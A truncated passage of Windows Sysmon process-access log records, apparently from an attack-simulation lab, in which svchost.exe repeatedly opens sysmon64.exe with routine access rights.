06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 